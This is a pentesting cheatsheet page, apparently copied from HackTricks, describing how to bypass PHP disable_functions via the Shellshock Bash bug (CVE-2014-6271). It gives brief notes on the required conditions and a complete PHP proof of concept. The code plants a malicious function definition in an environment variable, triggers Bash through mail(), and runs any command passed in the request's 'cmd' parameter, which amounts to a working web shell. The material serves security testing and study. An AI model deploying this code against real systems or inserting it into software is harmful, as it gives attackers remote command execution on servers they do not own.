daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

disable-functions-php-5-x-shellshock-exploit.md (2632B)


      1 ---
      2 title: "PHP 5.x Shellshock Command Execution"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # PHP 5.x Shellshock Command Execution
     14 
     15 This historical technique relies on CVE-2014-6271 (Shellshock): vulnerable Bash versions execute commands appended to an exported function definition. The PHP proof of concept sets such an environment variable and invokes `mail()`, which may cause the local mail transport to start a vulnerable Bash process.<sup>[[1]](#references)[[2]](#references)</sup>
     16 
     17 It works only when all of the required conditions are present, including a vulnerable Bash, `/bin/sh` resolving to Bash, a usable `mail()` path, and the relevant PHP functions not being disabled. It should therefore be treated as a legacy, environment-specific check.<sup>[[1]](#references)[[2]](#references)</sup>
     18 
     19 On historical `safe_mode` configurations, PHP commonly allowed users to change only environment variables whose names began with the configured `safe_mode_allowed_env_vars` prefixes; the default prefix was `PHP_`. The proof of concept therefore uses the name `PHP_LOL` for the exported function payload.<sup>[[2]](#references)</sup>
     20 
     21 ```php
     22 <?php
     23 echo "Disabled functions: " . ini_get('disable_functions') . "\n";
     24 
     25 function shellshock($cmd) {
     26     // Execute a command through CVE-2014-6271 when the environment is vulnerable.
     27     if (strstr(readlink('/bin/sh'), 'bash') === false) {
     28         return 'Not vulnerable: /bin/sh is not Bash';
     29     }
     30 
     31     $tmp = tempnam('.', 'data');
     32     putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
     33     mail('a@127.0.0.1', '', '', '', '-bv');
     34 
     35     $output = @file_get_contents($tmp);
     36     @unlink($tmp);
     37 
     38     return $output !== '' ? $output : 'No output, or the target is not vulnerable.';
     39 }
     40 
     41 echo shellshock($_REQUEST['cmd']);
     42 ?>
     43 ```
     44 
     45 ## References
     46 
     47 - [1] [NIST NVD - CVE-2014-6271](https://nvd.nist.gov/vuln/detail/CVE-2014-6271)
     48 - [2] [SafeBuff - `disable_functions` bypass examples (archived)](https://web.archive.org/web/20170801153107/http://blog.safebuff.com:80/2016/05/06/disable-functions-bypass/)